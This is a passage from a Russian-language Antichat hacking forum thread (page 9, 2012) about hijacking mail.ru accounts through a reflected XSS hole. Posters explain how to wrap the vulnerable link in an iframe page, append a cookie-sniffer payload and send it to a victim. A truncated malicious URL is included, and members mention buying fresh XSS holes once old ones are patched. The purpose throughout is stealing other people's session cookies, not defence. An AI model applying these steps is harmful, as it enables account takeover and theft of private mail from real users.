HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу Взлом mail.ru с помощью пассивной xss
   
Ответ
Страница 9 из 18 « Первая < 5 6 7 8 9 10 11 12 13 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #81  
Старый 17.02.2012, 01:00
chelyuskin
Новичок
Регистрация: 03.05.2010
Сообщений: 0
С нами: 8433874

Репутация: 0
По умолчанию
Цитата:

Сообщение от Yorvet

Нужна помощь.

Есть уязвимость, которую смог заставить работать только через type=text/javascript.

code:


Но такие ссылки не проходят в почту. Как сделать обычную ссылку на код-гиф.

Надеюсь, понятно объяснил, я в хсс не очень разбираюсь.

тебе тут активка нужна, так как
 
Ответить с цитированием

  #82  
Старый 17.02.2012, 01:00
Yorvet
Флудер
Регистрация: 19.08.2011
Сообщений: 2,281
С нами: 7754006

Репутация: 115


По умолчанию
Цитата:

Сообщение от chelyuskin

создал страницу на которую даешь ссылку. в этой странице в коде пишеш уже код который тебе нужен

Спасибо. А не мог бы ты сказать как должен выглядеть код страницы, чтобы при редиректе выполнялся скрипт?
 
Ответить с цитированием

  #83  
Старый 17.02.2012, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию
Цитата:

Сообщение от chelyuskin

тебе тут активка нужна, так как

не обязательно активка, достаточно создать страницу с ифреймом, в src указать адрес пасивки! послать жертве ссылку на страницу с ифреймом!
 
Ответить с цитированием

  #84  
Старый 17.02.2012, 01:00
alfred_bboy
Новичок
Регистрация: 16.02.2012
Сообщений: 2
С нами: 7493366

Репутация: 0
По умолчанию
у меня вопрос
а этот код (http://w4.dwar.mail.ru/*register.php#?referrer=">) отправлять в письме тому чью куки хочешь украсть или как?
я просто новичок в этом. автор опишика по подробнее
 
Ответить с цитированием

  #85  
Старый 17.02.2012, 01:00
alfred_bboy
Новичок
Регистрация: 16.02.2012
Сообщений: 2
С нами: 7493366

Репутация: 0
По умолчанию
по сделанной ссылке выходит ошибка а в логе снифера ниичего нет

для проверке кликнул по ссылке http://w4.dwar.mail.ru/*register.php...C/SCRIPT%3E%22
выдает ошибку
404 NOT Found !!!
The requested URL /*register.php was not found on this server.
Apache Server at w4.dwar.mail.ru Port 80
в чем дело?
может прикрепить пассивку к другой ссылке?
 
Ответить с цитированием

  #86  
Старый 17.02.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию
Цитата:

Сообщение от alfred_bboy

у меня вопрос
а этот код (http://w4.dwar.mail.ru/*register.php#?referrer=">) отправлять в письме тому чью куки хочешь украсть или как?
я просто новичок в этом. автор опишика по подробнее

К этому коду ты должен в конце подставить свой код для пассивной xss атаки он находится в твоем сниффере после > пишешь свой код для пассивной xss атаки и отправляешь жертве
 
Ответить с цитированием

  #87  
Старый 17.02.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию
Цитата:

Сообщение от alfred_bboy

по сделанной ссылке выходит ошибка а в логе снифера ниичего нет

для проверке кликнул по ссылке http://w4.dwar.mail.ru/*register.php...C/SCRIPT%3E%22
выдает ошибку
404 NOT Found !!!
The requested URL /*register.php was not found on this server.
Apache Server at w4.dwar.mail.ru Port 80
в чем дело?
может прикрепить пассивку к другой ссылке?

Эту пассивную xss уже давно прикрыли так как она слишком долго находилась в паблике
 
Ответить с цитированием

  #88  
Старый 22.02.2012, 01:00
piligrim111
Новичок
Регистрация: 19.02.2012
Сообщений: 2
С нами: 7489046

Репутация: 0
По умолчанию
ошибка 404 выходит(
 
Ответить с цитированием

  #89  
Старый 23.02.2012, 01:00
haker123123123
Новичок
Регистрация: 23.02.2012
Сообщений: 1
С нами: 7483286

Репутация: -1
По умолчанию
Спасибо большое tickhack всё работает сперва у меня не работало но я купил пассивку и заработало !!!!!!!!!!!!!
 
Ответить с цитированием

  #90  
Старый 26.02.2012, 01:00
tickhack
Новичок
Регистрация: 24.01.2012
Сообщений: 11
С нами: 7526486

Репутация: -10
По умолчанию
Цитата:

Сообщение от Miracle_In_DotA

чёт не пашет или я чёто не сделал правильно подскажите ниче не приходит((

НУ конечно не будет если ты этой пассивкой будешь пользоваться купи новую или найди сам потом зароботает!
 
Ответить с цитированием
Ответ
Страница 9 из 18 « Первая < 5 6 7 8 9 10 11 12 13 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.